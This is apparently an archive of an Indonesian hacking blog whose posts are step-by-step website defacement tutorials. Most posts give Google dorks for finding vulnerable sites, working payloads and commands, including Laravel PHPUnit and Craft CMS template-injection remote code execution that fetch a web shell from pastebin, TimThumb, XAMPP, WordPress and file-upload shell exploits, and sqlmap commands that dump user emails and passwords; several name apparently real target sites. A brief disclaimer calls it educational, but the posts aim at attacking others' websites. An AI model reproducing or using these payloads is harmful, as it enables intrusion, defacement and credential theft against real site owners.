Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Senin, 27 Juli 2020

Apa Itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?

Hallo ^_^ kali ini saya akan share tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?



Apa itu RCE (Remote Code Execution)


RCE (Remote Command Injection) adalah Dimana penyerang dapat memerintah sistem untuk menjalankan kode yang dinginkan,
Tipe attack seperti ini biasanya karena kurangnya validasi terhadap data yang bisa dikendalikan oleh user.

Apa dampak RCE (Remote Code Execution)


Seorang penyerang yang mampu mengeksekusi cacat seperti itu biasanya dapat mengeksekusi perintah dengan hak istimewa dari bahasa pemrograman atau server web.
Pada banyak bahasa dia dapat mengeluarkan perintah sistem, menulis, menghapus atau membaca file atau terhubung ke database.

Mungkin sekian dulu dari saya mengenai artikel tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini.

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."

Minggu, 26 Juli 2020

Exploit Laravel PHPUnit RCE ( Remote Code Execution )

Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )


Pertama Dorking dulu dengan dork dibawah in bro

DORK :

inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/

Exploit  : 

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data

Payload yang bisa digunakan :

<?php echo php_uname(); ?>
<?php echo system('id'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :

<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>


Setelah itu buka access Shell kalian di 

http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php


Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution


Kamis, 23 Juli 2020

Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

Hello para hacker, kali ini saya akan share tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )




Pertama dorking dulu dengan dork ini bro

inurl:/humans.txt intext:"Craft CMS"
intext:SEOmatic filetype:txt
site:*/humans.txt intext:SEOmatic
/* TEAM */ inurl:/humans.txt

Exploit :

/actions/seomatic/meta-container/all-meta-containers?uri=

ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

jika vuln akan tampil seperti ini


Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan upload shell dengan RCE Atau Remote Code Excution.

https://site.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/i7VyUpWu\x20%3E\x20zero.php%22));%27)}} 

Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.

Setelah itu buka acesss Shell kalian di

https://site.com/zero.php

Mungkin sekian dulu dari saya mengenai artikel tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : SSTI, Server Side Template Injection, SSTI TO RCE, SSTI PAYLOAD, Server side template injection tutorial, Server side template injection payload, Server side template injection exploit.

Senin, 22 Oktober 2018

Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..

Cara deface dengan XAMPP Local Write Access

Hello ^^ kali ini saya akan share Cara deface dengan XAMPP Local Write Access 
yuk langsung saja ke tutorialnya,


Dork :
inurl:/xampp/index.php intitle:XAMPP
inurl:/xampp/lang.php
inurl:/security/lang.php
inurl:/xampp/splash.php 

Exploit :
- localhost/xampp/lang.php?hacked_by_h0d3_g4n
- localhost/security/lang.php?hacked_by_
h0d3_g4n

Tutorial :

1. Cari targetnya pake Dork diatas.

2. Masukan salah satu exploitnya. contoh  
http://motasaindonesia.co.id/xampp/lang.php?hacked_by_h0d3_g4n

3. Ada notice seperti berikut. Abaikan saja :D . 




4. Lalu akses hasil defacenya. contoh http://www.motasaindonesia.co.id/xampp/lang.tmp



Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan XAMPP Local Write Access  semoga bermanfaat. 

Kamis, 01 Februari 2018

Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Pertama dorking dulu dengan dork ini bro
inurl:/wp-includes/rest-api
Exploit :
http://target.com/wp-json/wp/v2/posts/
Vuln seperti gambar dibawah ini
copy idnya

untuk script exploitnya kalian bisa copy disini
https://www.exploit-db.com/exploits/41224/
edit bagian  
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"

Save dengan format .rb

untuk pengguna windows kalian bisa install ruby dulu 
kebetulan saya menggunakan linux jadi langsung saja buka cmd
dan ketikan  ruby wpinject.rb





lalu masukan target http://target.com/ dan idnya yang tadi di copy


setelah itu tekan enter jika vuln akan tampil seperti ini Jika Tidak vuln Muncul Pesan "This site is not Vulnerable"






setelah itu Copas Link Tersebut Dan Buka Di Browser




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1 
Semoga bermanfaat

Rabu, 31 Januari 2018

Cara Deface Dengan Exploit Wordpress Themes Konzept

Heloo Gan hehehe
kali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,

Pertama Dorking dulu gan dengan dork ini,
inurl:/includes/uploadify/uploads



ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php

jika vuln akan tampil seperti ini

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


 siapkan shell kalian dan rubah format shellnya menjadi .jpg
 dan copy code php dibawah ini 
<?php

$url = "http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
       "file" => "@lol.jpg",
       "name" => "lol.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo "$data\n";

?>

ganti target.com dengan web target kalian yng mau di upload shell
ganti tulisan warna biru dengan shell kalian yang telah dirubah formatnya menjadi .jpg
ganti tulisan warna merah sesuai nama shell kalian setelah itu
save code php diatas tadi dengan format .php

Langkah selanjutnya jika pengguna windows menggunakan xampp kalau pengguna linux lansung saja .
ketikan di cmd php Konzept.php tekan enter dan akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



setelah itu buka shell acesss kalian di
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
 
atau
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/lol.php




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Themes Konzept  semoga bermanfaat


Selasa, 30 Januari 2018

Cara sql injection menggunakan sqlmap

Haloo gan , kali ini saya akan share tutorial hacking yaitu  Cara sql injection menggunakan sqlmap untuk hack website, xD .
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
langsung saja ke tutorialnya, pertama siapkan toolsnya dulu bisa kalian cari digoogle yaitu sqlmap dan python kalo di windows, btw saya pake os backbox jadi ga install python sama sqlmap sudah ada langsung osnya.
cari website yang vuln terhadap sqli, bisa kalian cari dengan dork ini.

inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu


setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini



jika muncul
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_test
setelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini

maka hasilnya seperti dibawh ini

nah sekaran keluarkan tabelnya
Database: ntlsinsg_db
[13 tables]
+---------------+
| ab_policy     |
| bra_countries |
| branches      |
| customer      |
| news          |
| news_file     |
| sch_about_us  |
| sch_areas     |
| sch_countries |
| sch_new       |
| sch_ports     |
| sch_services  |
| users         |
+---------------+

sekarang kita lihat user adminnya kira kira ada di tabel mana mungkin di tabel users mari kita check 
dengan perintah 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users --columns
maka hasilnya akan seperti ini
nah sekarang tahap terakhir yaitu dump dengan perintah seperti ini 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users -C email,password --dump
maka hasilnya akan seperti ini 
dan taraaaaaaaa akhirnya dapat username dan passwordnya sekarang lu crack passwordnya setelah crack  tinggal cari halaman adminnya dan upload shell terus deface :v
mungkin sekian dulu dari saya mengenai artikel Cara sql injection menggunakan sqlmap  semoga bermanfaat 

Cara Deface Dengan Exploit Wordpress Store Shell Upload

Tutorial Deface With Exploit Wordpress Store Shell Upload


 

Hai gan ketemu lagi dengan saya  kumpul berbagi, yang sudah lama tidak  update wkwkwkwk tapi kali ini saya akan update setiap hari  karena ada sesuatu yang ada di blog ini   jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload  , ok langsung saja ke tutorialnya ...
Pertama pertama dorking dulu dengan dork 
inurl:uploads/products_img/ 

setelah dorking kita CTRL+U di websitenya untkuk cek themes yang dipake,
untuk exploitnya
/upload/upload.php
jadi kaya gini nih gan
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
Kalo vuln blank 
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kamu pakai  kalian kunjungi dissini
http://sgmarketing.com.pl/nitip.php

ok langsung saja ke exploinya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan lupa Share  Cara Deface Dengan Exploit Wordpress Store Shell Upload
Thanks to all member defacer indonesia :*
Jika kurang jelas bisa tonton videonya disin.  atau disini https://www.youtube.com/watch?v=xBeVii3zXPg

Tutorial deface dengan array qqfile shell upload

Hello ^^ kali ini saya akan share Tutorial deface with array qqfile shell upload 2017.
yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
inurl:server/uploads kembangin lagi ya :v




setelah mendapatkan targetnya kita exploit dengan /server/php.php
jadi seperti ini http://target.com/path/server/php.php
kalo vuln akan muncul tulisan seperti ini


{"error":"No files were uploaded."}

atau seperti gambar dibawah ini






sekarang kita eksekusi targetnya dengan tools csrf online
untuk csrf online disini
http://www.sgmarketing.com.pl/nitip.php

setelah itu kita copy targetnya dan pastekan di csrf online
dan postfile isi dengan qqfile
dan klik kunci target
dan upload shell


jika bingung bisa lihat gambar dibawah ini







bila suksess upload shell muncul tulisan seperti ini
{"success":true}

untuk letak shellnya di http://target.com/path/server/upoads/namashell.php




Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=I62lF1oFlMs

Mungkin sekian dulu  dari saya mengenai artikel Tutorial deface dengan array qqfile shell upload semoga bermanfaat.

Cara Deface Dengan Auto Exploit Elfinder

Hello ^^ kali ini saya akan share Cara Deface Dengan Auto Exploit Elfinder
sembelum ke tutorialnya saya berterimakasih kepada Tu5b0l3d dan indoxploit yang bikin toolsnya xD .

yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
Dork = inurl:elfinder/files

setelah mendapatkan targetnya kita exploit dengan /php/connector.php
jadi seperti ini http://target.com/path/elfinder/php/connector.php
kalo vuln akan muncul tulisan seperti ini

{"error":["errUnknownCmd"]}

atau lihat gambar seperti dibawah ini





sekarang kita eksekusi dengan tools auto exploitnya
untuk script auto exploitnya disini
https://pastebin.com/S7Y2V19h

buka cmd dan masukan perintah php namafile.php http://target.com/path/elfinder/php/connector.php
maka hasilnya seperti ini

dan terakhir langsung upload shell lagi di
http://target.com/elfinder/files/k.php

terus buka shellnya di http://target.com/elfinder/files/namashellmu.php



Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=ZxHd243-cYo

Mungkin sekian dulu  dari saya mengenai artikel Cara Deface Dengan Auto Exploit Elfinder semoga bermanfaat